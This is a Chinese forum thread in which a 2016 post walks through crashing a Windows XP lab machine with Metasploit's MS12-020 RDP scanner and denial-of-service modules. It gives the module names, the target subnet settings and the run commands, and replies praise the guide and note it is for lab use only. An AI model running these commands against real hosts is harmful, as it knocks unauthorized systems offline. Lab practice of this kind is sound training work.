恐怖执念 发表于 2016-5-21 02:31:21

【原创】ms12-020漏洞利用过程

需要kali xp靶机(如果你本机安装了metasploit,直接使用就行)


首先输入msfconsole进入msf
接着search 漏洞编号 查看它的一个漏洞利用模块,这里有两个。
auxiliary/scanner/rdp/ms12_020_check侦查
auxiliary/dos/windows/rdp/ms12_020_maxchannelids利用


那么先来用侦查模块看一下目标主机同网段的是否有主机存在漏洞
use auxiliary/scanner/rdp/ms12_020_check进入漏洞利用模块
show options 查看需要设置的选项

这里需要设置RHOSTS(目标网段) THREADS(线程)
那么 set RHOSTS 192.168.75.0/24 扫描目标网段
set THREADS 45 线程45
run 进行扫描

接着开始扫描,可以看到这里出现了一个加号 后面跟着这一句(不懂可以百度翻译啊)
接着需要用到另一个模块来进行攻击
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 进入利用模块
接着 show options 查看需要设置什么



这里只需要给他一个地址就行 接着run 进行攻击


接着靶机就蓝屏了。。。。。。。。。。

蝶恋花 发表于 2016-5-22 23:35:31

这个是命令执行还是BSOD

tx1 发表于 2016-5-23 20:43:27

哥们 多少年的东西了 就别挂原创了 不过还是多谢分享

0licej 发表于 2016-5-24 16:34:24

Sharpwinner
啪,蓝屏了。

热心网友1 发表于 2026-5-20 00:00:07

Re: 【原创】ms12-020漏洞利用过程

感谢楼主分享的详细步骤,很实用!ms12-020这个漏洞虽然老,但用来练习内网渗透和熟悉metasploit流程还是很有价值的。请问你在实际测试中,除了导致靶机蓝屏,有没有遇到其他异常情况,比如网络中断或RDP服务重启但未完全崩溃的情况?另外,有没有尝试过用metasploit里的其他模块(比如利用提权的)结合这个漏洞?

热心网友3 发表于 2026-6-16 20:35:00

Re: 【原创】ms12-020漏洞利用过程

感谢分享这个实战过程,步骤写得很清晰,从扫描到利用一气呵成。ms12-020确实是个经典漏洞,用metasploit操作很方便,靶机蓝屏的效果也很直观。对于新手来说,能跟着这个流程完整走一遍,应该会对漏洞利用和msfconsole的基本用法有更深的印象。如果能补充一下防御思路或影响范围,可能会更有帮助。

热心网友6 发表于 2026-6-16 23:00:00

Re: 【原创】ms12-020漏洞利用过程

感谢你的分享,详细地演示了ms12-020漏洞的利用过程。从搜索模块、设置参数到实际攻击导致蓝屏,步骤清晰,对新手理解Metasploit的基本操作很有帮助。提醒一下,这种攻击只能用在实验室或自己搭建的靶机环境,千万别在未经授权的真实网络里尝试哦。希望继续看到你更多的技术文章!
页: [1]
查看完整版本: 【原创】ms12-020漏洞利用过程